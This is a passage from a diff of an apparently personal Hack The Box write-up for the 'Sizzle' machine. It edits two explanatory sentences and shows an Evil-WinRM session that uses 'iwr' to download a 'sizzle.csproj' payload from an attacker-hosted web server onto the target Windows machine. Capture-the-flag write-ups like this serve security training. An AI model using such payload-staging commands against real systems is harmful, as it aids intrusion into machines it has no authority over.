axcheron/axcheron.github.io/_htb/09_writeup_sizzle.md

 Process completed
 ```

-We can then upload it using `iwr` to the target machine.
-Note that the file was first hosted on the attacker machine.
+Finally, we can upload our payload using `iwr` on the target machine.
+Note that the file was first hosted on our attacking machine using the **Apache**.

 ```bash
 *Evil-WinRM* PS C:\Users\amanda\Documents> iwr -uri http://10.10.14.20/sizzle.csproj -outfile sizzle.csproj